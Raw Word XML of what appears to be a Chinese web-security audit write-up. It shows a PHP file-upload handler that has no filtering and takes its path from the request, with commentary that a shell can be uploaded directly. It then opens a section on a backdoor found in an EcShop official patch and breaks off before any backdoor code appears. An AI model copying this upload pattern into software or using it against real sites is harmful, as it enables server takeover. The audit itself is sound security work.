            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6595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"/>
              <w:ind w:left="0" w:right="2627"/>
              <w:jc w:val="right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{</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155" w:type="dxa"/>
            <w:tcBorders>
              <w:righ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614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292EF3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="4364"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left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25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  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="180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  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3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:rsidR="00292EF3" w:rsidRDefault="00292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="4"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0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if ( !empty( $_FILES ) )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="180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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="2012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$tempFile =</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="124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$_FILES['Filedata']['tmp_name'];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="3843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$attachmentID =</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126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createfiledir( );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="3843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$uploadPath =</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126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$_REQUEST['uploadPath'];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="3843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if ( trim( $uploadPath )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="124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== "" )</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6595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0" w:line="200" w:lineRule="exact"/>
              <w:ind w:left="0" w:right="2627"/>
              <w:jc w:val="right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{</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155" w:type="dxa"/>
            <w:tcBorders>
              <w:righ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614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292EF3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1104"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left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26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  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="2711" w:right="1290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else</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126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{</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6595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55" w:type="dxa"/>
            <w:tcBorders>
              <w:righ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614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"/>
              <w:ind w:left="758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$target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1430"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left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25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  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126" w:line="391" w:lineRule="auto"/>
              <w:ind w:left="180" w:right="2641" w:firstLine="3662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if ( !file_exists( $targetPath ) )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0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{</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6595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55" w:type="dxa"/>
            <w:tcBorders>
              <w:righ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614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0"/>
              <w:ind w:left="758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mkdir(</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="571"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/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27"/>
              <w:ind w:left="1061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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1120" w:left="1380" w:header="0" w:footer="93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9161" type="#_x0000_t202" style="width:337.5pt;height:164.9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$targetFile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 xml:space="preserve"> "//", "/",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targetPath )</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>."/"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_FILES['Filedata']['name'];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79" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>move_uploaded_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>file(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $tempFile, iconv(</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-87"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"UTF-8", "GBK", $targetFile ) );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$attachmentID;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8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="37"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s9160" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.2pt;width:337.5pt;height:83.45pt;z-index:5032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$targetPath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$uploadPath."</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>/sent/attachment/"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attachmentID;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$targetFile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 xml:space="preserve"> "//", "/",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targetPath )</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>."/"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_FILES['Filedata']['name'];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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也是没有任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原文件名，可直接上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-63"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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20" w:left="1380" w:header="0" w:footer="938" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="540" w:lineRule="exact"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="后门"/>
      <w:bookmarkStart w:id="57" w:name="EcShop官方补丁存后门"/>
      <w:bookmarkStart w:id="58" w:name="_bookmark27"/>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="43"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">EcShop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>官方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>丁存后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>门</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:ind w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：未知</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="292" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="415" w:firstLine="420"/>
        <w:jc w:val="both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的网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-72"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ecshop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-40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有点二次开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，所以每次升</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>级补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>丁都要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>比下修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w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>改，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了个大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，官方的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>补</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>丁文件内有段后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95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前来看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>订单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的人留得，黑暗啊！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="415"/>
        <w:jc w:val="both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w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反向分析了后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>门</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，找到了黑客的服</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>器，目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>大量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>电</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>商</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>沦</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>陷，我</w:t>
      </w:r>
